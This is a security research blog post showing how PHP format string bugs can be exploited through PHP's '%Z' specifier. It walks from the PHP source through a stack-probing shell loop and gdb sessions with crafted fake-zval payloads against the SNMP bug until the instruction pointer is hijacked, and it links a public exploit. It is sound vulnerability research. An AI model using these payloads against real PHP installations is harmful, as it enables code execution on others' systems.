Thursday, July 28, 2016

Exploiting PHP Format String Bugs the Easy Way

I’ve been spending a lot of time poking through the PHP source-code lately, and twice now I’ve come across format string vulnerabilities. [1][2]  I don’t consider format string bugs particularly interesting in-and-of themselves (they’re well known, and well understood), but it turns out PHP format strings are special.  PHP adds functionality that makes these bugs a breeze to exploit.  Let me explain…

First though, full disclosure: this technique is not entirely my own.  The original idea was inspired by Stefan Esser (@i0n1c) back in November of 2015. [3]  If you enjoy security research, especially relating to PHP, I would highly recommend you follow him!

Ok, PHP handles most format strings using custom internal functions.  There are lots of these defined all throughout the code.  For instance let’s grep for function definitions containing a format string as an argument.  This isn’t perfect or scientific, but it gives you an idea.

andrew@thinkpad /tmp % grep -PRHn "const char ?\* ?(format|fmt)" ./php-7.0.3 | wc -l
149

I won’t post all of those, but here are two examples.  In fact, these are the same functions that were erroneously called in the two bugs linked below.

static void zend_throw_or_error(int fetch_type, zend_class_entry *exception_ce, const char *format, ...)
ZEND_API ZEND_COLD zend_object *zend_throw_exception_ex(zend_class_entry *exception_ce, zend_long code, const char *format, ...)
... etc ...

Most, if not all, of these internal format string functions ultimately call either “xbuf_format_converter” (defined in main/spprintf.c), or “format_converter” (defined in main/snprintf.c).  These two functions actually do the work of walking along the string and substituting specifiers with their corresponding values.  This would be totally uninteresting, except for the fact that PHP adds one block that you don’t see in other format string implementations.  From “main/spprintf.c”…

case 'Z': {
    zvp = (zval*) va_arg(ap, zval*);
    free_zcopy = zend_make_printable_zval(zvp, &zcopy);
    if (free_zcopy) {
        zvp = &zcopy;
    }
    s_len = Z_STRLEN_P(zvp);
    s = Z_STRVAL_P(zvp);
    if (adjust_precision && precision < s_len) {
        s_len = precision;
    }
    break;
}

This special “%Z” option is designed to convert what’s known as a “zval” to a string. A zval (defined in Zend/zend_types.h) is simply a structure containing information about a variable, such as its type and value. Here is its definition, watered down for clarity…

typedef union _zend_value {
    zend_string      *str;
    zend_array       *arr;
    zend_object      *obj;
    ... lots of possible types ...
} zend_value;
 
struct _zval_struct {
    zend_value        value;
    union {
        struct {
            ZEND_ENDIAN_LOHI_4(
                zend_uchar    type,
                zend_uchar    type_flags,
                zend_uchar    const_flags,
                zend_uchar    reserved)
        } v;
        uint32_t type_info;
    } u1;
    ... uninteresting bits removed ...
 
};

As you can see, a zval contains type information, as well as an element (value) which can be interpreted in any number of different ways depending on the declared type. Now… as long as the code above is operating on a real zval, (which is assumed to be the case since the “%Z” is only used internally), everything will work fine. However, if we are able to specify a “%Z” on data we control, as is the case with format string bugs, we can force PHP to do unexpected things. So… lets assume we can control the data; what’s actually going on here? If you notice above, when “%Z” is specified, PHP calls “zend_make_printable_zval” on our fake zval, which eventually calls “_zval_get_string_func” (defined in Zend/zend_operators.c).  This function contains a switch/case operating on the “type” field of the zval struct.  Most of the cases are boring, converting integers to strings and such, but one stands out: IS_OBJECT.

case IS_OBJECT: {
   zval tmp;
   if (Z_OBJ_HT_P(op)->cast_object) {
      if (Z_OBJ_HT_P(op)->cast_object(op, &tmp, IS_STRING) == SUCCESS) {
... etc ...

Function pointers!  That looks juicy!  Let’s investigate those macros.  From Zend/zend_types.h:

#define Z_OBJ(zval)        (zval).value.obj
#define Z_OBJ_P(zval_p)    Z_OBJ(*(zval_p))
 
#define Z_OBJ_HT(zval)     Z_OBJ(zval)->handlers
#define Z_OBJ_HT_P(zval_p) Z_OBJ_HT(*(zval_p))

Oh goodie! :) If we use the “%Z” operator on memory we control, we will control those function pointers too!  All we need to do is arrange a fake zval in memory such that they become something useful.  Since we know what the struct(s) should look like, this shouldn’t be too hard.

In order to test this, we’ll use the SNMP error format string bug (php bug #71704) [2]. The trigger looks like this:

$session = new SNMP(SNMP::VERSION_3, "127.0.0.1:161", "public");
$session->exceptions_enabled = SNMP::ERRNO_ANY;
try {
    $session->get($argv[1]); // FORMAT STRING IN ARGV[1]
} catch (SNMPException $e) {
    echo $e->getMessage();
}

Let’s start by poking around memory to find a pointer to our data.  We’ll use a series of “%d”s to walk down the stack, followed by “w00t%swoot”.  If we ever see our data show up between the “woot” flags, we win!

andrew@thinkpad /tmp % for i in {0..15}; do \
> echo -e "\n=========$i=========="; \
> ./php-7.0.3/sapi/cli/php ./snmp.php \
>     `perl -e 'print "%d"x'$i' . "woot%swoot";'`; \
> done
 
=========0==========
Invalid object identifier: woot0�%�
                                   �'�
                                      �'�U�woot
=========1==========
woot
=========2==========
Invalid object identifier: -1077237472-1216724645woot �%��Iwoot
=========3==========
Segmentation fault (core dumped)
 
=========4==========
Invalid object identifier: -1079040880-1216933541-12561159361wootwoot
=========5==========
Segmentation fault (core dumped)
 
=========6==========
Invalid object identifier: -1074727184-1216655013-12561159361-12561159361woot(null)woot
=========7==========
Invalid object identifier: -1076316912-1217130149-12561159361-125611593610woowoot
=========8==========
Invalid object identifier: -1080902384-1217461925-12582130881-125821308810-1257840348woot�� ��$�woot
=========9==========
Invalid object identifier: -1075700320-1217191589-12561159361-125611593610-1255743196136380004woot$�&�woot
=========10==========
Invalid object identifier: -1079922576-1217162917-12561159361-125611593610-1255743196136380004-1256115968woot(null)woot
=========11==========
Segmentation fault (core dumped)
 
=========12==========
Invalid object identifier: -1075153200-1217171109-12561159361-125611593610-1255743196136380004-1256115968032wootInvalid object identifier: %swoot
=========13==========
Invalid object identifier: -1081187680-1217064613-12561159361-125611593610-1255743196136380004-1256115968032142166864woot%d%d%d%d%d%d%d%d%d%d%d%d%dwoot%swootwoot
=========14==========
Invalid object identifier: -1078765664-1216839333-12561159361-125611593610-1255743196136380004-1256115968032142166864-1255809008wootwoot
=========15==========
Invalid object identifier: -1075294480-1216716453-12561159361-125611593610-1255743196136380004-1256115968032142166864-1255809008-1255702516woot�woottnvalid object identifier: -1079248000woot�åN

Aha!!! If you didn’t already see it, check out number 13.  After popping 13 values of the stack, the 14th value was a pointer to our string. Switching the “%s” with a “%08x” reveals the pointer to be 0xb5a5e010.  It doesn’t seem to change much, so for now let’s ignore the obvious ASLR problem and focus on getting EIP.

First let’s open it up in gdb and see what’s happening.  We know that PHP will be expecting a zval at the pointer, so let’s add some junk data to the start of our string.  This will be our fake zval.  Based on the struct definition above, we know the 9th byte represents the type.  In this case we’d like to represent the OBJECT type, which is 0x08.  Let’s also add some extra padding so that we have room to play as we go. All said, our fake zval will look like:

[ fake zval ............ ][ junk ......][ format string  ]
[ 8bytes padding ][ 0x08 ][some padding][ %d x 13 ][ %Z  ]

andrew@thinkpad /tmp % gdb -q ./php-7.0.3/sapi/cli/php 
Reading symbols from ./php-7.0.3/sapi/cli/php...done.
(gdb) r ./snmp.php `echo -e "AAAABBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
Starting program: /home/ubuntu/php-7.0.3/sapi/cli/php ./snmp.php `echo -e "AAAABBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
 
Program received signal SIGSEGV, Segmentation fault.
0x08301482 in _zval_get_string_func (op=op@entry=0xb5a5e010)
    at /home/ubuntu/php-7.0.3/Zend/zend_operators.c:838
838             if (Z_OBJ_HT_P(op)->cast_object) {
(gdb) x/1i $eip
=> 0x8301482 <_zval_get_string_func>:  mov    0x10(%ebx),%edx
(gdb) i r $ebx
ebx            0x41414141   1094795585
(gdb)

Nice! We landed just where we wanted to, and now PHP is trying to dereference our AAAA. We’d like to give it a valid address, so how about the address of BBBB directly after? Math time: if AAAA is at 0xb5a5e010, that means BBBB is at 0xb5a5e014. However, the instruction isn’t dereferencing the pointer exactly, but rather, 16 bytes past it (0x10). So we need to subtract 0x10 from our pointer to account, giving us 0xb5a5e004. Let’s try it. Don’t forget to reverse it, since x86 is little endian.

andrew@thinkpad /tmp % gdb -q ./php-7.0.3/sapi/cli/php 
Reading symbols from ./php-7.0.3/sapi/cli/php...done.
(gdb) r ./snmp.php `echo -e "\x04\xe0\xa5\xb5BBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
Starting program: /home/ubuntu/php-7.0.3/sapi/cli/php ./snmp.php `echo -e "\x04\xe0\xa5\xb5BBBB\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
 
Program received signal SIGSEGV, Segmentation fault.
0x08301485 in _zval_get_string_func (op=op@entry=0xb5a5e010)
    at /home/ubuntu/php-7.0.3/Zend/zend_operators.c:838
838             if (Z_OBJ_HT_P(op)->cast_object) {
(gdb) x/1i $eip
=> 0x8301485 <_zval_get_string_func>:  mov    0x54(%edx),%eax
(gdb) i r $ebx $edx
ebx            0xb5a5e004   -1247420412
edx            0x42424242   1111638594
(gdb)

Sweet! It used our pointer and is trying to dereference BBBB. Rinse and repeat. This time let’s target CCCC. Since they’re 9 bytes into the string, the pointer will be 0xb5a5e019, however again we need to account for the offset. This time it’s 0x54. Simple subtraction gives us 0xb5a5efc5. Let’s try it.

andrew@thinkpad /tmp % gdb -q ./php-7.0.3/sapi/cli/php 
Reading symbols from ./php-7.0.3/sapi/cli/php...done.
(gdb) r ./snmp.php `echo -e "\x04\xe0\xa5\xb5\xc5\xdf\xa5\xb5\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
Starting program: /home/ubuntu/php-7.0.3/sapi/cli/php ./snmp.php `echo -e "\x04\xe0\xa5\xb5\xc5\xdf\xa5\xb5\x08CCCC%d%d%d%d%d%d%d%d%d%d%d%d%d%Z"`
 
Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) i r $ebx $edx $eip
ebx            0xb5a5e004   -1247420412
edx            0xbfffb060   -1073762208
eip            0x43434343   0x43434343
(gdb)

We win! With control of EIP it’s essentially game over. The only big problem still standing in our way is ASLR. Considering the wide variation of PHP binaries that exist in the wild as well as the prevalence of ASLR, this would normally be quite tricky. But we have another trick up our sleeve. We can cheat!

As long as we’re careful, an invalid format string won’t necessarily crash the application, even if it misbehaves. With a little finesse we can use the same format string bug to leak an address. Once we know the address of a string, we can patch it dynamically and then run it through again; this time for real. The challenge then becomes modifying the string without modifying its location. I’ll leave that as an exercise for the reader. :)

If you’d like to see a working exploit for this issue, mine is public on exploit-db. [4] It bypasses ASLR and NX beautifully. All the pointers and ROP gadgets are from a custom binary, so you’ll still need to put your own work in, but it’s a start. Enjoy!

[1]. https://bugs.php.net/bug.php?id=71105
[2]. https://bugs.php.net/bug.php?id=71704
[3]. https://twitter.com/i0n1c/status/664706994478161920
[4]. https://www.exploit-db.com/exploits/39645/